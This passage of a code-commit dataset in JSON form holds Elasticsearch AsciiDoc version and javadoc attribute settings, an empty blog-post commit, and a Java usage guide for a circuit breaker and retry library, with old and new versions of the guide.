unreleased\n\n:issue: https:\/\/github.com\/elastic\/elasticsearch\/issues\/\n:ml-issue: https:\/\/github.com\/elastic\/ml-cpp\/issues\/\n:pull: https:\/\/github.com\/elastic\/elasticsearch\/pull\/\n:ml-pull: https:\/\/github.com\/elastic\/ml-cpp\/pull\/\n:docker-repo: docker.elastic.co\/elasticsearch\/elasticsearch\n:docker-image: {docker-repo}:{version}\n:plugin_url: https:\/\/artifacts.elastic.co\/downloads\/elasticsearch-plugins\n\n\/\/\/\/\/\/\/\nJavadoc roots used to generate links from Painless's API reference\n\/\/\/\/\/\/\/\n:java11-javadoc: https:\/\/docs.oracle.com\/en\/java\/javase\/11\/docs\/api\n:joda-time-javadoc: http:\/\/www.joda.org\/joda-time\/apidocs\n:lucene-core-javadoc: http:\/\/lucene.apache.org\/core\/{lucene_version_path}\/core\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n:elasticsearch-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/elasticsearch\/{version}-SNAPSHOT\n:transport-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/transport\/{version}-SNAPSHOT\n:rest-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client\/{version}-SNAPSHOT\n:rest-client-sniffer-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client-sniffer\/{version}-SNAPSHOT\n:rest-high-level-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-high-level-client\/{version}-SNAPSHOT\n:painless-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/painless\/lang-painless\/{version}-SNAPSHOT\n:parent-join-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/parent-join-client\/{version}-SNAPSHOT\n:percolator-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/percolator-client\/{version}-SNAPSHOT\n:matrixstats-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/aggs-matrix-stats-client\/{version}-SNAPSHOT\n:rank-eval-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/rank-eval-client\/{version}-SNAPSHOT\n:version_qualified: {bare_version}-SNAPSHOT\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n:elasticsearch-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/elasticsearch\/{version}\n:transport-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/transport\/{version}\n:rest-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client\/{version}\n:rest-client-sniffer-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client-sniffer\/{version}\n:rest-high-level-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-high-level-client\/{version}\n:painless-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/painless\/lang-painless\/{version}\n:parent-join-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/parent-join-client\/{version}\n:percolator-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/percolator-client\/{version}\n:matrixstats-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/aggs-matrix-stats-client\/{version}\n:rank-eval-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/rank-eval-client\/{version}\n:version_qualified: {bare_version}\nendif::[]\n\n:javadoc-client: {rest-high-level-client-javadoc}\/org\/elasticsearch\/client\n:javadoc-xpack: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\n:javadoc-license: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\/license\n:javadoc-watcher: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\/watcher\n\n\/\/\/\/\/\/\/\nShared attribute values are pulled from elastic\/docs\n\/\/\/\/\/\/\/\n\ninclude::{asciidoc-dir}\/..\/..\/shared\/attributes.asciidoc[]\n","old_contents":":version: 8.0.0-alpha1\n\/\/\/\/\nbare_version never includes -alpha or -beta\n\/\/\/\/\n:bare_version: 8.0.0\n:major-version: 8.x\n:prev-major-version: 7.x\n:lucene_version: 8.1.0\n:lucene_version_path: 8_1_0\n:branch: master\n:jdk: 11.0.2\n:jdk_major: 11\n:build_flavor: default\n:build_type: tar\n\n\/\/\/\/\/\/\/\/\/\/\nrelease-state can be: released | prerelease | unreleased\n\/\/\/\/\/\/\/\/\/\/\n\n:release-state: unreleased\n\n:issue: https:\/\/github.com\/elastic\/elasticsearch\/issues\/\n:ml-issue: https:\/\/github.com\/elastic\/ml-cpp\/issues\/\n:pull: https:\/\/github.com\/elastic\/elasticsearch\/pull\/\n:ml-pull: https:\/\/github.com\/elastic\/ml-cpp\/pull\/\n:docker-repo: docker.elastic.co\/elasticsearch\/elasticsearch\n:docker-image: {docker-repo}:{version}\n:plugin_url: https:\/\/artifacts.elastic.co\/downloads\/elasticsearch-plugins\n\n\/\/\/\/\/\/\/\nJavadoc roots used to generate links from Painless's API reference\n\/\/\/\/\/\/\/\n:java11-javadoc: https:\/\/docs.oracle.com\/en\/java\/javase\/11\/docs\/api\n:joda-time-javadoc: http:\/\/www.joda.org\/joda-time\/apidocs\n:lucene-core-javadoc: http:\/\/lucene.apache.org\/core\/{lucene_version_path}\/core\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n:elasticsearch-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/elasticsearch\/{version}-SNAPSHOT\n:transport-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/transport\/{version}-SNAPSHOT\n:rest-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client\/{version}-SNAPSHOT\n:rest-client-sniffer-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client-sniffer\/{version}-SNAPSHOT\n:rest-high-level-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-high-level-client\/{version}-SNAPSHOT\n:painless-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/painless\/lang-painless\/{version}-SNAPSHOT\n:parent-join-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/parent-join-client\/{version}-SNAPSHOT\n:percolator-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/percolator-client\/{version}-SNAPSHOT\n:matrixstats-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/aggs-matrix-stats-client\/{version}-SNAPSHOT\n:rank-eval-client-javadoc: https:\/\/snapshots.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/rank-eval-client\/{version}-SNAPSHOT\n:version_qualified: {bare_version}-SNAPSHOT\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n:elasticsearch-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/elasticsearch\/{version}\n:transport-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/transport\/{version}\n:rest-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client\/{version}\n:rest-client-sniffer-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-client-sniffer\/{version}\n:rest-high-level-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/client\/elasticsearch-rest-high-level-client\/{version}\n:painless-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/painless\/lang-painless\/{version}\n:parent-join-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/parent-join-client\/{version}\n:percolator-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/percolator-client\/{version}\n:matrixstats-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/aggs-matrix-stats-client\/{version}\n:rank-eval-client-javadoc: https:\/\/artifacts.elastic.co\/javadoc\/org\/elasticsearch\/plugin\/rank-eval-client\/{version}\n:version_qualified: {bare_version}\nendif::[]\n\n:javadoc-client: {rest-high-level-client-javadoc}\/org\/elasticsearch\/client\n:javadoc-xpack: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\n:javadoc-license: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\/license\n:javadoc-watcher: {rest-high-level-client-javadoc}\/org\/elasticsearch\/protocol\/xpack\/watcher\n\n\/\/\/\/\/\/\/\nShared attribute values are pulled from elastic\/docs\n\/\/\/\/\/\/\/\n\ninclude::{asciidoc-dir}\/..\/..\/shared\/attributes.asciidoc[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5e39d14f030c3f4a0bff82edf8150010fff618ab","subject":"y2b create post The iPhone Nexus Super Combo","message":"y2b create post The iPhone Nexus Super Combo","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2014-07-31-The-iPhone-Nexus-Super-Combo.adoc","new_file":"_posts\/2014-07-31-The-iPhone-Nexus-Super-Combo.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"6fe398776b474b1adb7605597fcb96483825a78a","subject":"Updated documentation","message":"Updated documentation\n","repos":"goldobin\/resilience4j,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,resilience4j\/resilience4j,drmaas\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,storozhukBM\/javaslang-circuitbreaker,drmaas\/resilience4j,mehtabsinghmann\/resilience4j","old_file":"src\/docs\/asciidoc\/usage_guide.adoc","new_file":"src\/docs\/asciidoc\/usage_guide.adoc","new_contents":"== Usage Guide\n\n=== Configure the CircuitBreaker\n\nThis library comes with an `InMemoryCircuitBreakerRegistry` based on a `ConcurrentMap` which provides thread safety and atomicity guarantees. You must use the CircuitBreakerRegistry to manage (create and retrieve) your CircuitBreakers. You can create a `InMemoryCircuitBreakerRegistry` with a default global `CircuitBreakerConfig` for all of your CircuitBreakers as follows.\n\n[source,java]\n----\n\/\/ Create a InMemoryCircuitBreakerRegistry with a default global configuration\n\/\/ (maxFailures = 3, waitInterval = 60[s], ignoredExceptions = empty)\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\n----\n\nAs an alternative you can provide your own custom global `CircuitBreakerConfig`. In order to create a custom global CircuitBreakerConfig or a CircuitBreakerConfig for a specific CircuitBreaker, you can use the CircuitBreakerConfig builder. You can configure the maximum number of allowed failures and the wait interval [ms], which specifies how long the CircuitBreaker should stay in state `OPEN`.\n\n[source,java]\n----\n\/\/ Create a custom configuration for a CircuitBreaker\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .maxFailures(1)\n .waitInterval(1000)\n .build();\n\n\/\/ Create a InMemoryCircuitBreakerRegistry with a custom global configuration\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.of(circuitBreakerConfig);\n\n\/\/ Get a CircuitBreaker from the CircuitBreakerRegistry with the global default configuration\nCircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker(\"otherName\");\n\n\/\/ Get a CircuitBreaker from the CircuitBreakerRegistry with a custom configuration\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\", circuitBreakerConfig);\n----\n\n=== Functional programming example\n\nYou can decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction` function with `CircuitBreaker.decorateCheckedSupplier()`, `CircuitBreaker.decorateCheckedRunnable()` or `CircuitBreaker.decorateCheckedFunction()`. You can invoke the returned function with `Try.of()` or `Try.run()` from https:\/\/github.com\/javaslang\/javaslang[javaslang]. This allows to chain further functions with `map`, `flatMap`, `filter`, `recover` or `andThen`. The chained functions are only invoked, if the CircuitBreaker is CLOSED or HALF_CLOSED.\nIn the following example, `Try.of()` returns a `Success<String>` Monad, if the invocation of the function is successful. If the function throws an exception, a `Failure<Throwable>` Monad is returned and `map` is not invoked.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\n\n\/\/ When\nTry.CheckedSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateCheckedSupplier(() -> \"This can be any method which returns: 'Hello\", circuitBreaker);\n\n\/\/ You can chain other functions with `map` and `flatMap`.\n\/\/ The `Try` Monad returns a `Success<String>`, if all functions run successfully.\nTry<String> result = Try.of(decoratedSupplier)\n .map(value -> value + \" world'\");\n\n\/\/ Then\nassertThat(result.isSuccess()).isTrue();\nassertThat(result.get()).isEqualTo(\"This can be any method which returns: 'Hello world'\");\n----\n\nYou could also chain up functions which are decorated by different CircuitBreakers.\n\n[source,java]\n----\n\/\/Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\nCircuitBreaker anotherCircuitBreaker = circuitBreakerRegistry.circuitBreaker(\"anotherTestName\");\n\n\/\/ When I create a Supplier and a Function which are decorated by different CircuitBreakers\nTry.CheckedSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateCheckedSupplier(() -> \"Hello\", circuitBreaker);\n\nTry.CheckedFunction<String, String> decoratedFunction = CircuitBreaker\n .decorateCheckedFunction((input) -> input + \" world\", anotherCircuitBreaker);\n\n\/\/ and I chain a function with `map`.\nTry<String> result = Try.of(decoratedSupplier)\n .map(decoratedFunction);\n\n\/\/ Then\nassertThat(result.get()).isEqualTo(\"Hello world\");\n----\n\n=== OPEN CircuitBreaker example\n\nIn this test case `map` is not invoked, because the CircuitBreaker is OPEN. The call to `Try.of` returns a `Failure<Throwable>` Monad so that the chained function is not invoked.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\n\/\/ Create a custom configration so that only 1 failure is allowed and the wait interval is 1[s]\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .maxFailures(1)\n .waitInterval(1000)\n .build();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\", circuitBreakerConfig);\n\n\/\/ CircuitBreaker is initially CLOSED\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ Simulate a failure attempt\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is still CLOSED, because 1 failure is allowed\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ Simulate a failure attempt\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is OPEN, because maxFailures > 1\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.OPEN);\n\n\/\/ When I decorate my function and invoke the decorated function\nTry<String> result = Try.of(CircuitBreaker.decorateCheckedSupplier(() -> \"Hello\", circuitBreaker))\n .map(value -> value + \" world\");\n\n\/\/ Then the call fails, because CircuitBreaker is OPEN\nassertThat(result.isFailure()).isTrue();\n\/\/ and the exception is a CircuitBreakerOpenException\nassertThat(result.failed().get()).isInstanceOf(CircuitBreakerOpenException.class);\n----\n\n=== Recover from an exception\n\nIf you want to recover from any exception, you can chain the method `Try.recover()`. The recovery method is only invoked, if `Try.of()` returns a `Failure<Throwable>` Monad.\n\n[source,java]\n----\n\/\/Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\n\n\/\/ When I decorate my function and invoke the decorated function\nTry.CheckedSupplier<String> checkedSupplier = CircuitBreaker.decorateCheckedSupplier(() -> {\n Thread.sleep(1000);\n throw new RuntimeException(\"BAM!\");\n }, circuitBreaker);\nTry<String> result = Try.of(checkedSupplier)\n .recover((throwable) -> \"Hello Recovery\");\n\n\/\/Then the function should be a success, because the exception could be recovered\nassertThat(result.isSuccess()).isTrue();\n\/\/ and the result must match the result of the recovery function.\nassertThat(result.get()).isEqualTo(\"Hello Recovery\");\n----\n\n=== Customize exception handler\nThe default exception handler counts all type of exceptions as failures and triggers the CircuitBreaker. If you want to use a custom exception handler, you have to implement the functional interface `Predicate` which has a method `test`. The Predicate must return true if the exception should count as a failure, otherwise it must return false.\nThe following example shows how to ignore an `IOException`, but all other exception types still count as failures.\n\n[source,java,indent=0]\n----\ninclude::..\/..\/test\/java\/io\/github\/robwin\/circuitbreaker\/CircuitBreakerTest.java[tags=shouldNotTriggerCircuitBreakerOpenException]\n----\n\n=== Customize event listener\nThe default event listener logs state transitions with INFO level.\n\n----\nINFO i.g.r.c.i.DefaultCircuitBreakerEventListener - CircuitBreaker 'testName' changes state from CLOSED to OPEN\n----\n\nIf you want to use a custom event listener, you have to implement the functional interface `CircuitBreakerEventListener` which has a method `onCircuitBreakerEvent(CircuitBreakerEvent circuitBreakerEvent)`. The only event which currently exists is `CircuitBreakerStateTransitionEvent`.\n\n[source,java]\n----\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .onCircuitBreakerEvent((event) -> LOG.info(event.toString()))\n .build();\n----\n\n=== Retry a failed function\n\nYou can also retry a failed function and recover from the exception, if the maximum retry count was reached. You can create a `Retry` context using a default configuration as follows.\n\n[source,java]\n----\n\/\/ Create a Retry context with a default global configuration\n\/\/ (maxAttempts = 3, waitInterval = 500[ms], ignoredExceptions = empty)\nRetry retryContext = Retry.ofDefaults();\n----\n\nIn order to create a custom `Retry` context, you can use the Retry context builder. You can configure the maximum number of retry attempts and the wait interval [ms] between successive attempts. Furthermore, you can add exceptions to the ignore list which must not trigger a retry.\n\n[source,java]\n----\nRetry retryContext = Retry.custom()\n .maxAttempts(2)\n .waitInterval(1000)\n .onException(throwable -> Match.of(throwable)\n .whenType(WebServiceException.class).then(false)\n .otherwise(true).get())\n .build();\n----\n\nYou can decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction` function with `Retry.retryableCheckedSupplier()`, `Retry.retryableCheckedRunnable()` or `Retry.retryableCheckedFunction()`.\n\n[source,java]\n----\n\/\/ Given I have a HelloWorldService which throws an exception\nHelloWorldService helloWorldService = mock(HelloWorldService.class);\ngiven(helloWorldService.sayHelloWorld()).willThrow(new WebServiceException(\"BAM!\"));\n\n\/\/ Create a Retry with default configuration\n\/\/ (maxAttempts = 3, waitInterval = 500[ms], ignoredExceptions = empty)\nRetry retryContext = Retry.ofDefaults();\n\/\/ Decorate the invocation of the HelloWorldService\nTry.CheckedSupplier<String> retryableSupplier = Retry.retryableCheckedSupplier(helloWorldService::sayHelloWorld, retryContext);\n\n\/\/ When I invoke the function\nTry<String> result = Try.of(retryableSupplier).recover((throwable) -> \"Hello world from recovery function\");\n\n\/\/ Then the helloWorldService should be invoked 3 times\nBDDMockito.then(helloWorldService).should(times(3)).sayHelloWorld();\n\/\/ and the exception should be handled by the recovery function\nassertThat(result.get()).isEqualTo(\"Hello world from recovery function\");\n----\n\n=== CompletableFuture example\n\nYou can also invoke a decorated function asynchronously by using a `CompletableFuture` and chain further functions.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\n\n\/\/ When\nSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateSupplier(() -> \"This can be any method which returns: 'Hello\", circuitBreaker);\n\nCompletableFuture<String> future = CompletableFuture.supplyAsync(decoratedSupplier)\n .thenApply(value -> value + \" world'\");\n\n\/\/Then\nassertThat(future.get()).isEqualTo(\"This can be any method which returns: 'Hello world'\");\n----\n\n=== Reactive Streams example\n\nYou can also invoke a decorated function asynchronously by using a Reactive Streams implementation like https:\/\/github.com\/ReactiveX\/RxJava[RxJava] or https:\/\/github.com\/reactor\/reactor\/[Project Reactor].\n\n[source,java]\n----\n \/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\n\/\/ CircuitBreaker is initially CLOSED\ncircuitBreaker.recordFailure(new RuntimeException());\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ CircuitBreaker is still CLOSED, because 1 failure is allowed\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is OPEN, because maxFailures > 1\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.OPEN);\n\n\/\/ Decorate the supplier of the HelloWorldService with CircuitBreaker functionality\nSupplier<String> supplier = CircuitBreaker.decorateSupplier(() -> \"Hello world\", circuitBreaker);\n\n\/\/When I consume from a reactive stream it should forward the CircuitBreakerOpenException.\nStreams.generate(supplier::get)\n .map(value -> value + \" from reactive streams\")\n .consume(value -> {\n LOG.info(value);\n }, exception -> {\n LOG.info(\"Exception handled: \" + exception.toString());\n assertThat(exception).isInstanceOf(CircuitBreakerOpenException.class);\n });\n----\n\n=== Example with Dropwizard Metrics\n\nYou can use https:\/\/dropwizard.github.io\/metrics\/[Dropwizard Metrics] to get runtime metrics of your functions. The project provides several higher-order functions to decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction`. The decorator creates a histogram and a meter for your function. A histogram measures min, mean, max, standard deviation and quantiles like the median or 95th percentile of the execution time. A meter measures the rate of executions.\n\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\nMetricRegistry metricRegistry = new MetricRegistry();\nTimer timer = metricRegistry.timer(name(\"test\"));\n\n\/\/ When I create a long running supplier which takes 2 seconds\nTry.CheckedSupplier<String> supplier = () -> {\n Thread.sleep(2000);\n return \"Hello world\";\n};\n\n\/\/ and decorate the supplier with a Metrics timer\nTry.CheckedSupplier<String> timedSupplier = Metrics.timedCheckedSupplier(supplier, timer);\n\n\/\/ and decorate the supplier with a CircuitBreaker\nTry.CheckedSupplier<String> circuitBreakerAndTimedSupplier = CircuitBreaker\n .decorateCheckedSupplier(timedSupplier, circuitBreaker);\n\nString value = circuitBreakerAndTimedSupplier.get();\n\n\/\/ Then the Metrics execution counter should be 1\nassertThat(timer.getCount()).isEqualTo(1);\n\/\/ and the mean time should be greater than 2[s]\nassertThat(timer.getSnapshot().getMean()).isGreaterThan(2);\n\nassertThat(value).isEqualTo(\"Hello world\");\n----\n","old_contents":"== Usage Guide\n\n=== Configure the CircuitBreaker\n\nThis library comes with an `InMemoryCircuitBreakerRegistry` based on a `ConcurrentMap` which provides thread safety and atomicity guarantees. You must use the CircuitBreakerRegistry to manage (create and retrieve) your CircuitBreakers. You can create a `InMemoryCircuitBreakerRegistry` with a default global `CircuitBreakerConfig` for all of your CircuitBreakers as follows.\n\n[source,java]\n----\n\/\/ Create a InMemoryCircuitBreakerRegistry with a default global configuration\n\/\/ (maxFailures = 3, waitInterval = 60[s], ignoredExceptions = empty)\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\n----\n\nAs an alternative you can provide your own custom global `CircuitBreakerConfig`. In order to create a custom global CircuitBreakerConfig or a CircuitBreakerConfig for a specific CircuitBreaker, you can use the CircuitBreakerConfig builder. You can configure the maximum number of allowed failures and the wait interval [ms], which specifies how long the CircuitBreaker should stay in state `OPEN`. Furthermore, you can add exceptions to the ignore list which must not trigger the CircuitBreaker.\n\n[source,java]\n----\n\/\/ Create a custom configuration for a CircuitBreaker\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .maxFailures(1)\n .waitInterval(1000)\n .ignoredException(BusinessException.class)\n .ignoredException(AnotherBusinessException.class)\n .build();\n\n\/\/ Create a InMemoryCircuitBreakerRegistry with a custom global configuration\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.of(circuitBreakerConfig);\n\n\/\/ Get a CircuitBreaker from the CircuitBreakerRegistry with the global default configuration\nCircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker(\"otherName\");\n\n\/\/ Get a CircuitBreaker from the CircuitBreakerRegistry with a custom configuration\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\", circuitBreakerConfig);\n----\n\n=== Functional programming example\n\nYou can decorate any `Supplier \/ Runnable \/ Function` or `CheckedSupplier \/ CheckedRunnable \/ CheckedFunction` function with `CircuitBreaker.decorateCheckedSupplier()`, `CircuitBreaker.decorateCheckedRunnable()` or `CircuitBreaker.decorateCheckedFunction()`. You can invoke the returned function with `Try.of()` or `Try.run()` from https:\/\/github.com\/javaslang\/javaslang[javaslang]. This allows to chain further functions with `map`, `flatMap`, `filter`, `recover` or `andThen`. The chained functions are only invoked, if the CircuitBreaker is CLOSED or HALF_CLOSED.\nIn the following example, `Try.of()` returns a `Success<String>` Monad, if the invocation of the function is successful. If the function throws an exception, a `Failure<Throwable>` Monad is returned and `map` is not invoked.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\");\n\n\/\/ When\nTry.CheckedSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateCheckedSupplier(() -> \"This can be any method which returns: 'Hello\", circuitBreaker);\n\n\/\/ You can chain other functions with `map` and `flatMap`.\n\/\/ The `Try` Monad returns a `Success<String>`, if all functions run successfully.\nTry<String> result = Try.of(decoratedSupplier)\n .map(value -> value + \" world'\");\n\n\/\/ Then\nassertThat(result.isSuccess()).isTrue();\nassertThat(result.get()).isEqualTo(\"This can be any method which returns: 'Hello world'\");\n----\n\nYou could also chain up functions which are decorated by different CircuitBreakers.\n\n[source,java]\n----\n\/\/Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"testName\");\nCircuitBreaker anotherCircuitBreaker = circuitBreakerRegistry.circuitBreaker(\"anotherTestName\");\n\n\/\/ When I create a Supplier and a Function which are decorated by different CircuitBreakers\nTry.CheckedSupplier<String> decoratedSupplier = CircuitBreaker\n .decorateCheckedSupplier(() -> \"Hello\", circuitBreaker);\n\nTry.CheckedFunction<String, String> decoratedFunction = CircuitBreaker\n .decorateCheckedFunction((input) -> input + \" world\", anotherCircuitBreaker);\n\n\/\/ and I chain a function with `map`.\nTry<String> result = Try.of(decoratedSupplier)\n .map(decoratedFunction);\n\n\/\/ Then\nassertThat(result.get()).isEqualTo(\"Hello world\");\n----\n\n=== OPEN CircuitBreaker example\n\nIn this test case `map` is not invoked, because the CircuitBreaker is OPEN. The call to `Try.of` returns a `Failure<Throwable>` Monad so that the chained function is not invoked.\n\n[source,java]\n----\n\/\/ Given\nCircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.ofDefaults();\n\/\/ Create a custom configration so that only 1 failure is allowed and the wait interval is 1[s]\nCircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()\n .maxFailures(1)\n .waitInterval(1000)\n .build();\nCircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker(\"uniqueName\", circuitBreakerConfig);\n\n\/\/ CircuitBreaker is initially CLOSED\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ Simulate a failure attempt\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is still CLOSED, because 1 failure is allowed\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.CLOSED);\n\/\/ Simulate a failure attempt\ncircuitBreaker.recordFailure(new RuntimeException());\n\/\/ CircuitBreaker is OPEN, because maxFailures > 1\nassertThat(circuitBreaker.getState()).isEqualTo(CircuitBreaker.State.OPEN);\n\n\/\/ When I decorate my function and invoke the decorated function\nTry<String> result = Try.of(CircuitBreaker.decorateCheckedSupplier(() -> \"Hello\", circuitBreaker))\n .map(value -> value + \" world\");\n\n\/\/ Then the call fails, because CircuitBreaker is OPEN\nassertThat(result.isFailure()).isTrue();\n\/\/ and the exception is a CircuitBreakerOpenException\nassertThat(result.failed().get()).isInstanceOf(CircuitBreakerOpenException.class);\n----\n\n=== Recover from an exception\n\nIf you want to recover from any 